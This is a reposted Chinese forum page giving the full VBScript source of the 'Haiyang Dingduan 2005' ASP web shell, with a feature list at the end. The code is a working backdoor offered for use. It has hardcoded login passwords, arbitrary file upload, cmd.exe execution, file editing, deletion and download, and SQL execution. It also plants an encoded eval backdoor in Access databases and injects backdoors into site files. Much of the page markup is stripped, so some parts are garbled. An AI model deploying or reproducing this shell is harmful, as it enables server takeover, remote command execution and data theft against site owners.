[转载]海阳顶端网ASP木马＠2005α版全部源代码

信息来源：黑客手册

<%@ LANGUAGE="VBSCRIPT"　codepage ="936"
"密码第一个是makelove,第二个是haiyangtop.126.com,查找替换这两个单词就可以改成别的密码了%>



<%if err then%>


<%
end if %>



<%"上传代码因化境的太长，这完全是抄桂林老兵的，对此表示感谢--上传类定义
response.buffer=true
filename=Request.ServerVariables("URL")
Server.ScriptTimeout=5000
On Error Resume Next
Dim oUpFileStream
Class UpFile_Class
Dim Form,File
Public Sub GetDate (RetSize)
　 "定义变量
　Dim RequestBinDate,sSpace,bCrLf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,oFileInfo
　Dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
　Dim iFindStart,iFindEnd
　Dim iFormStart,iFormEnd,sFormName
　 "代码开始
　If Request.TotalBytes < 1 Then
　　Err = 1
　　Exit Sub
　End If
　If RetSize > 0 Then
　　If Request.TotalBytes > RetSize Then
　　Err = 2
　　Exit Sub
　　End If
　End If
　Set Form = Server.CreateObject ("Scripting.Dictionary")
　Form.CompareMode = 1
　Set File = Server.CreateObject ("Scripting.Dictionary")
　File.CompareMode = 1
　Set tStream = Server.CreateObject ("Adodb.Stream")
　Set oUpFileStream = Server.CreateObject ("Adodb.Stream")
　oUpFileStream.Type = 1
　oUpFileStream.Mode = 3
　oUpFileStream.Open
　oUpFileStream.Write Request.BinaryRead (Request.TotalBytes)
　oUpFileStream.Position = 0
　RequestBinDate = oUpFileStream.Read
　iFormEnd = oUpFileStream.Size
　bCrLf = ChrB (13) & ChrB (10)
　"取得每个项目之间的分隔符
　sSpace = MidB (RequestBinDate,1, InStrB (1,RequestBinDate,bCrLf)-1)
　iStart = LenB　(sSpace)
　iFormStart = iStart+2
　"分解项目
　Do
　　iInfoEnd = InStrB (iFormStart,RequestBinDate,bCrLf & bCrLf)+3
　　tStream.Type = 1
　　tStream.Mode = 3
　　tStream.Open
　　oUpFileStream.Position = iFormStart
　　oUpFileStream.CopyTo tStream,iInfoEnd-iFormStart
　　tStream.Position = 0
　　tStream.Type = 2
　　tStream.CharSet = "gb2312"
　　sInfo = tStream.ReadText　　　
　　iFormStart = InStrB (iInfoEnd,RequestBinDate,sSpace)-1
　　iFindStart = InStr (22,sInfo,"name=""",1)+6
　　iFindEnd = InStr (iFindStart,sInfo,"""",1)
　　sFormName = Mid　(sinfo,iFindStart,iFindEnd-iFindStart)
　　If InStr　(45,sInfo,"filename=""",1) > 0 Then
　　　Set oFileInfo = new FileInfo_Class
　　　iFindStart = InStr (iFindEnd,sInfo,"filename=""",1)+10
　　　iFindEnd = InStr (iFindStart,sInfo,"""",1)
　　　sFileName = Mid　(sinfo,iFindStart,iFindEnd-iFindStart)
　　　oFileInfo.FileName = Mid (sFileName,InStrRev (sFileName, "/")+1)
　　　oFileInfo.FilePath = Left (sFileName,InStrRev (sFileName, "/"))
　　　oFileInfo.FileExt = Mid (sFileName,InStrRev (sFileName, ".")+1)
　　　iFindStart = InStr (iFindEnd,sInfo,"Content-Type: ",1)+14
　　　iFindEnd = InStr (iFindStart,sInfo,vbCr)
　　　oFileInfo.FileType = Mid　(sinfo,iFindStart,iFindEnd-iFindStart)
　　　oFileInfo.FileStart = iInfoEnd
　　　oFileInfo.FileSize = iFormStart -iInfoEnd -2
　　　oFileInfo.FormName = sFormName
　　　file.add sFormName,oFileInfo
　　else
tStream.Close
　　　tStream.Type = 1
　　　tStream.Mode = 3
　　　tStream.Open
　　　oUpFileStream.Position = iInfoEnd
　　　oUpFileStream.CopyTo tStream,iFormStart-iInfoEnd-2
　　　tStream.Position = 0
　　　tStream.Type = 2
　　　tStream.CharSet = "gb2312"
　　　sFormValue = tStream.ReadText
　　　If Form.Exists (sFormName) Then
　　　　Form (sFormName) = Form (sFormName) & ", " & sFormValue
　　　　else
　　　　form.Add sFormName,sFormValue
　　　End If
　　End If
　　tStream.Close
　　iFormStart = iFormStart+iStart+2
　Loop Until　(iFormStart+2) = iFormEnd
　RequestBinDate = ""
　Set tStream = Nothing
End Sub
End Class
Class FileInfo_Class
Dim FormName,FileName,FilePath,FileSize,FileType,FileStart,FileExt
Public Function SaveToFile (Path)
　On Error Resume Next
　Dim oFileStream
　Set oFileStream = CreateObject ("Adodb.Stream")
　oFileStream.Type = 1
　oFileStream.Mode = 3
　oFileStream.Open
　oUpFileStream.Position = FileStart
　oUpFileStream.CopyTo oFileStream,FileSize
　oFileStream.SaveToFile Path,2
　oFileStream.Close
　Set oFileStream = Nothing
End Function
Public Function FileDate
　oUpFileStream.Position = FileStart
　FileDate = oUpFileStream.Read (FileSize)
　End Function
End Class
%>
<% if Request("passwordlcx")="makelove" then
session("passwordlcx")="lcx"
response.redirect Request.ServerVariables("URL")
elseif session("passwordlcx")=""then
%>

<%else%>
<%
if request("up")="yes" then
　 set upload=new UpFile_Class
　 upload.GetDate (1024*1024)
　 for each formName in upload.file
　 set file=upload.file(formName)
　　if file.FileSize>0 then
savepath=upload.form("filepath")
　　file.SaveToFile savepath
response.write "上传成功!上传后的路径为"&savepath&"
"
response.write "
返回上一页"
　 end if
　 set file=nothing
　 next
　 set upload=nothing
　 showerr()
　 response.end
end if
%>
<%
function out()
Response.Cookies("password")=""
response.redirect ""&url&""
End Function%>
<%"-------------------搜索文件函数------------------
on error resume next
SearchString = Request("SearchString")
count=0
Function SearchFile( f, s, title )
Set fo = objfsolhn.OpenTextFile(f)
content = fo.ReadAll"读全部文本到content
fo.Close
SearchFile = inStr(1, content, S, vbTextCompare)>0　"从第一个字符开始检查content里面是否有S
If SearchFile Then"如果有,则提出文件TITLE存入变量
pos1 = InStr(1, content, "", vbTextCompare)
title = ""
If pos1 > 0 And pos2 > 0 Then"取TITLE标记中间的字符
title = Mid( content, pos1 + 7, pos2 - pos1 - 7 )
End If
End If
End Function
Function FileLink( f, title )
vPath =f.Path"取路径
If title = "" Then title = f.Name"做链接
"FileLink = "" & title & ""
FileLink = vPath
FileLink = "

·" & FileLink & "

"
End Function
Sub SearchFolder( fd, s )
found = False
For each f In fd.Files
pos = InStrRev(f.Path, "." )
If pos > 0 Then
ext = Mid(f.Path, pos + 1 )
Else
ext = ""
End If
If LCase(ext) = "asp" or LCase(ext) = "asa" or LCase(ext) = "cer"　or LCase(ext) = "cdx" Then
If SearchFile( f, s, title ) Then
Response.Write FileLink(f, title)
count=count+1
End If
End If
Next
For each sfd In fd.SubFolders
SearchFolder sfd, s
Next
End Sub"搜索结束%>
<%"-------------------------mssql的sql扩展开始---------------------------------
Dim strsql, objDBConn, objRS, intFieldCount, intCounter,strcon
strcon =trim(Request.form("strcon"))
strsql =trim(Request.form("SQL"))
if strSQL <> "" and lcase(left(trim(strsql),6))<>"select" Then
Response.Write "SQL命令: " & strsql & "成功运行
"
Set objDBConn = Server.CreateObject("ADODB.Connection")
　objDBConn.Open strcon
objdbconn.execute(strsql)
objDBConn.Close　
　 Set objDBConn = Nothing
end if
"-----------------------------------数据库记录列表----------------------------------------
DBDriver = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="
strRootFolder = Server.MapPath("/")
scriptname = Request.ServerVariables("SCRIPT_NAME")　　
if request("op")="db" and request("dbname")<>"" and request("tablename")<>"" then
dbname=trim(request("dbname"))
tablename=request("tablename")
Set objConn = Server.CreateObject("ADODB.Connection")
if instr(dbname,"Info=False")>0　then
objConn.ConnectionString = dbname
else
objConn.ConnectionString = DBDriver & dbname
end if
objConn.Open
Set objTableRS = objConn.OpenSchema(20,Array(Empty, Empty, Empty, "TABLE"))
if tablename="" then tablename=objTableRS("Table_Name").Value
%>

　
　　

<%=objfsolhn.GetFilename(dbname)%> 　　　 　　　 　　　　<%Do While Not objTableRS.EOF%> 　　　　 　　　　　 　　　　 　　　　<%objTableRS.MoveNext Loop%> 　　　 3 "><%=objTableRS("Table_Name").Value%>

<%=tablename%> 　　　　　　 　　　　　　　 　　　　　　　　 　　　　　　　　　 　　　　　　　　　　 "> 　　　　　　　　　　 <%dim mysql,i,j j=1 mysql="Select Top 10 * From ["&tablename&"]" Set objRS=objConn.Execute(mysql) For i=0 to objRs.Fields.Count-1 Response.write"" Next Response.write "" if objrs.eof then else DO While NOT objRS.Eof Response.write "" %> <% For i=0 to objRs.Fields.Count-1 Response.write"" Next Response.write"" objRS.MoveNext j=j+1 Loop end if set objRs = nothing set objTableRS = nothing objConn.Close set objConn = nothing %> "&objRS.Fields(i).name&" " If IsNull(objRs.Fields(i).value) or objRs.Fields(i).value="" or objRs.Fields(i).value=" " then response.write " " else 　Response.write Server.HTMLEncode(objRs.Fields(i).value) end if Response.write" 最多显示10条记录，要察看更多记录请使用SQL命令

<%
Response.End
end if
%>
<%
"----------------------------数据库对象列表---------------------------------------------
if request("op")="db" and request("dbname")<>"" then
dbname=trim(request("dbname"))
Set objConn = Server.CreateObject("ADODB.Connection")
"objConn.ConnectionString = DBDriver & dbname
if instr(dbname,"Info=False")>0　then
objConn.ConnectionString = dbname
else
objConn.ConnectionString = DBDriver & dbname
end if
objConn.Open
Set objTableRS = objConn.OpenSchema(20,Array(Empty, Empty, Empty, "TABLE"))
%>

　
　　
　　

<%=objfsolhn.GetFilename(dbname)%> 　　　 　　　 　　　　<%Do While Not objTableRS.EOF%> 　　　　 　　　　　 　　　　 　　　　<%objTableRS.MoveNext Loop objTableRS.MoveFirst%> 　　　 3 "><%=objTableRS("Table_Name").Value%>

执行SQL命令 　　　 　　　<%While Not objTableRS.EOF%> 　　　 　　　　 　　　　　 　　　　　 <%Set objColumnRS = objConn.OpenSchema(4,Array(Empty, Empty, objTableRS("Table_Name").Value)) 　　　　While Not objColumnRS.EOF 　　　　iLength = objColumnRS("Character_Maximum_Length") iPrecision = objColumnRS("Numeric_Precision") 　　　　　　iScale = objColumnRS("Numeric_Scale") iDefaultValue = objColumnRS("Column_Default") 　　　　　　　 If IsNull(iLength) then iLength = " " 　　　　　　If IsNull(iPrecision) then iPrecision = " " If IsNull(iScale) then iScale = " " If IsNull(iDefaultValue) then iDefaultValue = " "%> 　　　　　 　　　　　 　　　　　 　　　　　 　　　　　 　　　　　 　　　　 　　　　<%objColumnRS.MoveNext Wend objTableRS.MoveNext Set objColumnRS = Nothing Response.write " " Wend objTableRS.Close Set objTableRS = Nothing objConn.Close Set objConn = Nothing %> <%=objTableRS("Table_Name").Value%> 字段名 数据类型 字段大小 精度 是否允许为空 默认值 <%=objColumnRS("Column_Name")%> <%=fieldtype(objColumnRS("Data_Type"))%> <%=iLength%> <%=iPrecision%> 　　　　　　<%If objColumnRS("Is_Nullable") then Response.Write "是" 　　　　　　else 　　　　　　Response.write "否" End If%> 　　　　　 <%=iDefaultValue%>

<%
Response.End
end if
%>
<%
"----------------------------执行SQL命令---------------------------------------------
if request("op")="sql" then
dbname=trim(request("dbname"))
Set objConn = Server.CreateObject("ADODB.Connection")
"objConn.ConnectionString = DBDriver & dbname
if instr(dbname,"Info=False")>0　then
objConn.ConnectionString = dbname
else
objConn.ConnectionString = DBDriver & dbname
end if
objConn.Open
Set objTableRS = objConn.OpenSchema(20,Array(Empty, Empty, Empty, "TABLE"))
j=0
%>

　
　　
　　

<%=objfsolhn.GetFilename(dbname)%> 　　　 　　　 　　　　<%Do While Not objTableRS.EOF%> 　　　　 　　　　　 　　　　 　　　　<%objTableRS.MoveNext Loop%> 　　　 3 "><%=objTableRS("Table_Name").Value%>

"> 　　　　　　　 　　　 　　　 　　　　 <%if request("cmd")<>"" then mysql=request("cmd") Set objRS=objConn.Execute(mysql) if objrs.state = 1 then For i=0 to objRs.Fields.Count-1 Response.write"" Next Response.write "" if objrs.eof then %> <%else DO While NOT objRS.Eof Response.write "" %> <% For i=0 to objRs.Fields.Count-1 Response.write"" Next Response.write"" objRS.MoveNext j=j+1 Loop end if set objRs = nothing end if end if set objTableRS = nothing objConn.Close set objConn = nothing %> 　　 "&objRS.Fields(i).name&" " If IsNull(objRs.Fields(i).value) or objRs.Fields(i).value="" or objRs.Fields(i).value=" " then response.write " " else 　Response.write Server.HTMLEncode(objRs.Fields(i).value) end if Response.write" 　　　 　　　<%if request("cmd")<>"" then response.Write("命令执行成功，返回 "&j&" 条记录")%>

<%
Response.End
end if
%>
<%
url= Request.ServerVariables("URL")
if trim(request.form("password"))<>"" and trim(request.form("password"))<>"haiyangtop.126.com" then call out()
if trim(request.form("password"))="haiyangtop.126.com" then
response.cookies("password")="allen"
response.redirect ""&url&""
else if Request.Cookies("password")<>"allen" then
call login() "密码错误
response.end "停止运行
end if
select case request("id")
case "edit"
call edit()
case "upload"
call upload()
case "dir"
call dir()
case "down"
call downloadFile(request("path"))
case "inject"
call inject()
case else
call main()
end select
end if
sub login()
for i=0 to 25
on error resume next
IsObj=false
VerObj=""
dim TestObj
set TestObj=server.CreateObject(ObjTotest(i,0))
If -2147221005 <> Err then
IsObj = True
VerObj = TestObj.version
if VerObj="" or isnull(VerObj) then VerObj=TestObj.about
end if
ObjTotest(i,2)=IsObj
ObjTotest(i,3)=VerObj
next
%>

<% dim t1,t2,lsabc,thetime t1=timer for i=1 to 500000 lsabc= 1 + 1 next t2=timer thetime=cstr(int(( (t2-t1)*10000 )+0.5)/10) %> 服务器名 <%=Request.ServerVariables("SERVER_NAME")%> 服务器IP <%=Request.ServerVariables("LOCAL_ADDR")%> 服务器时间 <%=now%> 本文件绝对路径 <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%> 服务器操作系统 <%=Request.ServerVariables("OS")%> 服务器运算速度测试 <%=thetime%> 毫秒 "　name=form9 target="newwin" method="GET"> 　 　　　 　　　 mdb+sql数据库操作: <%" -------------------在ACESS数据库里写入asp后门开始----------------------- DBDriver = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" dbname=request("dbname") Set objConn = Server.CreateObject("ADODB.Connection") objConn.ConnectionString = DBDriver & dbname objConn.Open objConn.execute("create table notdownloadlcx(notdownloadlcx oleobject)") set rs=server.createobject("adodb.recordset") 　　sql="select * from notdownloadlcx" rs.open sql,objConn,1,3 rs.addnew 　　rs("notdownloadlcx").appendchunk(chrB(asc("<")) & chrB(asc("s")) & chrB(asc("c"))& chrB(asc("r")) & chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(" "))& chrB(asc("r"))& chrB(asc("u"))& chrB(asc("n"))& chrB(asc("a"))& chrB(asc("t"))& chrB(asc("="))& chrB(asc("s"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc("v"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc(" "))& chrB(asc("l"))& chrB(asc("a"))& chrB(asc("n"))& chrB(asc("g"))& chrB(asc("u"))& chrB(asc("a"))& chrB(asc("g"))& chrB(asc("e"))& chrB(asc("="))& chrB(asc("j"))& chrB(asc("a"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">"))& chrB(asc("e"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("l"))& chrB(asc("("))& chrB(asc("r"))& chrB(asc("e"))& chrB(asc("q"))& chrB(asc("u"))& chrB(asc("e"))& chrB(asc("s"))& chrB(asc("t"))& chrB(asc("."))& chrB(asc("f"))& chrB(asc("o"))& chrB(asc("r"))& chrB(asc("m"))& chrB(asc("("))& chrB(asc("""))& chrB(asc("#"))& chrB(asc("""))& chrB(asc(")"))& chrB(asc("+"))& chrB(asc("""))& chrB(asc("""))& chrB(asc(")"))& chrB(asc("<"))& chrB(asc("/"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">"))) 　　rs.update 　　rs.close set rs=nothing objConn.close set objCon_n=nothing "-----------------------------------------------------数据库操作结束------------------------------------ "---------------------免fso代码写文件开始针对中文----------------------------------- pathlcx=trim(Request.form("pathlcx")) textlcx=trim(Request.form("textlcx")) if textlcx<>"" and pathlcx<>"" then textlcx=replace(textlcx,">","^>") textlcx=replace(textlcx,"<","^<") textlcx=replace(textlcx,"&","^&") textlcx=replace(textlcx,chr(34),"^"&chr(34)) textlcx=replace(textlcx,chr(10),"^"&chr(10)) textlcx=replace(textlcx,chr(13),"^"&chr(13)) set shell=server.createobject("shell.application") set shellfolder=shell.namespace("C:/Documents and Settings/Default User/「开始」菜单/程序/附件") set shellfolderitem=shellfolder.parsename("记事本.lnk") set objshelllink =shellfolderitem.getlink objshelllink.path="cmd.exe" objshelllink.arguments="/c echo "&textlcx&">"&pathlcx&" &&del c:/a.lnk" objshelllink.save("c:/a.lnk") shell.namespace("c:/").items.item("a.lnk").invokeverb end if "--------------免fso代码写文件结束-----------免fso表单开始-------------%> <%"-------------免fso表单单代码结束------------%> " method="post"> 　输入要浏览的目录,最后要加/ copy 目录或文件(不要加目录和文件名） move 目录或文件(不要加目录和文件名） 路径： 程序： 不可以加参数 CMD命令对话框 路径与文件名 要生成的文件内容，不可以有回车： <% ok=Request("ok") response.write oScriptlhn.exec ("cmd.exe /c "& ok).stdout.readall %> 　 ?up=yes enctype="multipart/form-data"> 已有物理目录+文件名: 　　　 　　　　　文件地址: <%"-----------------免fso代码shell.application开始------------------ DSnXA = Request.Form("text")　 "目录浏览 if (DSnXA <> "")　then set shell=server.createobject("shell.application") "建立shell对象 set fod1=shell.namespace(DSnXA) set foditems=fod1.items for each co in foditems response.write "" & co.path & "-----" & co.size & " " next end if %> <% DSnXA1 = Request.Form("text1")　"目录拷贝，不能进行文件拷贝 DSnXA2 = Request.Form("text2") if DSnXA1<>"" and DSnXA2<>"" then set shell1=server.createobject("shell.application") "建立shell对象 set fod1=shell1.namespace(DSnXA2) for i=len(DSnXA1) to 1 step -1 if mid(DSnXA1,i,1)="/" then 　 path=left(DSnXA1,i-1) 　 exit for end if next if len(path)=2 then path=path & "/" path2=right(DSnXA1,len(DSnXA1)-i) set fod2=shell1.namespace(path) set foditem=fod2.parsename(path2) fod1.copyhere foditem response.write "command completed success!" end if %> <% DSnXA3 = Request.Form("text3")　 "目录移动 DSnXA4 = Request.Form("text4") if DSnXA3<>"" and DSnXA4<>"" then set shell2=server.createobject("shell.application") "建立shell对象 set fod1=shell2.namespace(DSnXA4) for i=len(DSnXA3) to 1 step -1 if mid(DSnXA3,i,1)="/" then 　 path=left(DSnXA3,i-1) 　 exit for end if next if len(path)=2 then path=path & "/" path2=right(DSnXA3,len(DSnXA3)-i) set fod2=shell2.namespace(path) set foditem=fod2.parsename(path2) fod1.movehere foditem response.write "command completed success!" end if %> <% DSnXA5 = Request.Form("text5")　　"执行程序要指定路径 DSnXA6 = Request.Form("text6") if DSnXA5<>"" and DSnXA6<>"" then set shell3=server.createobject("shell.application") "建立shell对象 shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb response.write "command completed success!" end if %> 　　　 　 Enter Password： <%end sub%> <% end if %> <%sub main()"---------------------免fso代码结束，fso代码开始--------------------- urlpath=Request.ServerVariables("SERVER_NAME") dim cpath,lpath if Request("path")="" then lpath="/" else lpath=Request("path")&"/" end if if Request("attrib")="true" then cpath=lpath attrib="true" else cpath=Server.MapPath(lpath) attrib="" end if %> bgColor=#b8b8b8 border=0 class="noborder"> height=22 colspan="4" bgcolor="#EEEEEE" >切换盘符： <% For Each thing in objfsolhn.Drives Response.write ""&thing.DriveLetter&"盘:　　　　　" NEXT %>　 本机局域网地址： <%= "//" & oScriptNetlhn.ComputerName & "/" & oScriptNetlhn.UserName %> 　 <% if request.form("submit1")="返回免fso页面" then call out() end if%> <% If (IsObject(oFilelcx)) Then Response.Write Server.HTMLEncode(oFilelcx.ReadAll) oFilelcx.Close Call objfsolhn.DeleteFile(szTempFile, True) End If %> <% Set fd = objfsolhn.GetFolder(Request("path88")&"/") If SearchString <> "" Then Response.Write " 如下脚本文件内嵌入搜索的" & SearchString & "关键字： " SearchFolder fd,SearchString End If %> 文件名 （鼠标移到文件名可以查看给文件的属性） " Next end if Response.write" <% if Request("attrib")="true"　then response.write "点击切换到相对路径编辑模式" else response.write "点击切换到绝对路径编辑模式" end if %> 路径: <%=cpath%>　 当前浏览目录:<%=lpath%> 浏览目录: 〖请用绝对路径〗   <% DSnXA = Request.Form(".CMD") If (DSnXA <> "") Then szTempFile = "c:/" & objfsolhn.GetTempName( ) Call oScriptlhn.Run ("cmd.exe /c " & DSnXA & " > " & szTempFile, 0, True) Set oFilelcx = objfsolhn.OpenTextFile (szTempFile, 1, False, 0) End If%> " method="POST" name=userdata> ?up=yes enctype="multipart/form-data"> 已有物理目录+文件名: 　　　 文件地址: " method="post"> 关键字搜索： type="submit" value="可用于检索存在的asp木马"> on_Submit="return crfile(newfile.filename.value);"> 〖新建文件和新建目录不能同名〗 <% dim theFolder,theSubFolders if objfsolhn.FolderExists(cpath)then Set theFolder=objfsolhn.GetFolder(cpath) Set theSubFolders=theFolder.SubFolders Response.write"■↑回上级目录 " For Each x In theSubFolders%> <%Response.write"└■　"&x.Name&" ×删除 " Next end if %> 大小（字节） 文件操作 <% dim theFiles if objfsolhn.FolderExists(cpath)then Set theFolder=objfsolhn.GetFolder(cpath) Set theFiles=theFolder.Files Response.write"" For Each x In theFiles if Request("attrib")="true" then showstring=""&x.Name&"" else showstring=""&x.Name&"" end if Response.write" □"&showstring&" "&x.size&" edit copy del down inject " %>

<% end sub
sub edit()
if request("op")="del"　then
"**********删除文件********
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = objfsolhn.GetFile(whichfile)
thisfile.Delete True
Response.write "
删除成功！要刷新才能看到效果."
"**********删除文件结束********
else
if request("op")="copy" then
"**********复制文件********
if Request("attrib")="true" then
whichfile=Request("path")
dsfile=Request("dpath")
else
whichfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if
Set thisfile = objfsolhn.GetFile(whichfile)
thisfile.copy dsfile
Response.write "

源文件："+whichfile+"

"
Response.write "
目的文件："+dsfile+""
Response.write "
复制成功！要刷新才能看到效果!

"
"**********复制文件结束********
else
if request.form("text")="" then
if Request("creat")<>"yes" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = objfsolhn.OpenTextFile(whichfile, 1, False)
counter=0
thisline=Server.HTMLEncode(thisfile.readall)
thisfile.Close
end if
%>

">


bgColor=#b8b8b8 border=0 class="noborder">


height=22 bgcolor="#EEEEEE" >

海阳顶端网ASP木马＠2005α版文件编辑器

height=22 bgcolor="#EEEEEE" >

<%=thisline%>

height=22 bgcolor="#EEEEEE" >

value="提交" name="B1">

height=22 bgcolor="#EEEEEE" >文件名： value="<%=Request("path")%>"readonly>

<%else
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set outfile=objfsolhn.CreateTextFile(whichfile)
outfile.WriteLine Request("text")
outfile.close
Response.write "修改成功！要刷新才能看到效果!"
end if
end if
end if
end sub
%>
<% sub dir()
if request("op")="del"　then
"***********删除目录**********
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
objfsolhn.DeleteFolder whichdir,True
Response.write "删除成功！要刷新才能看到效果，删除的目录为:"&whichdir&""
"**********删除目录结束*************
else
"***********新建目录**********
if request("op")="creat"　then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
objfsolhn.CreateFolder whichdir
Response.write "建立成功！要刷新才能看到效果,建立的目录为:"&whichdir&""
"***********新建目录结束**********
end if
end if
end sub
"****下载文件
function downloadFile(strFile)
if　request("attrib")="" then
strFilename = server.MapPath(strFile)
end if
if　request("attrib")="true" then
strFilename = Request("path")
end if
Response.Buffer = True
Response.Clear
Set s = Server.CreateObject("ADODB.Stream")
s.Open
s.Type = 1
on error resume next
if not objfsolhn.FileExists(strFilename) then
　Response.Write("

Error:

" & strFilename & " does not exist

")
　Response.End
end if
Set f = objfsolhn.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
　Response.Write("

Error:

" & err.Description & "

")
　Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
　Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
%>
<%"插入文件
sub inject()
if Request("id")="inject"　and request("attrib")<>"true"then
testfile=Server.MapPath(""&Request("path")&"")
set thisfile=objfsolhn.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine("")
thisfile.close
Response.write "succeed!请用冰狐浪子asp后门来来访问你插入的文件"&Request("path")&"默认密码是#"
else
Response.write "

"
Response.write ""
Response.write "

"
end if
end sub
%>
<%function fieldtype(typeid)
select case typeid
case 130 fieldtype = "文本"
case 2 fieldtype = "整型"
case 3 fieldtype = "长整型"
case 7 fieldtype = "日期/时间"
case 5 fieldtype = "双精度型"
case 11 fieldtype = "是/否"
case 128 fieldtype = "OLE 对象"
case else fieldtype = typeid
end select
end function
function fillbefore(str,prefix,totallen)
str=CStr(str)
if len(str)for i=1 to totallen-len(str)
str = prefix & str
next
end if
fillbefore = str
end function
%>


警告：对非法使用此程序可能带来的任何不良后果责任自负！海阳顶端网

此版本感谢：网辰在线、桂林老兵、冰狐浪子、蓝屏、小路、wangyong、czy、sun.c所做的一切努力◆LCX&ALLEN◆




==============
简 介： 增加以下功能：

1.服务器的fso改名也可以用此木马了，直接调用object组件。
2.鼠标操作ACESS和MSSQL数据库
3.独创的acess后门插入
4.mssql语句执行
5.直接插入冰狐浪子的asp后门
5.去掉了2004版的所有bug
此版可被杀毒软件发现，若有病毒提醒属正常现象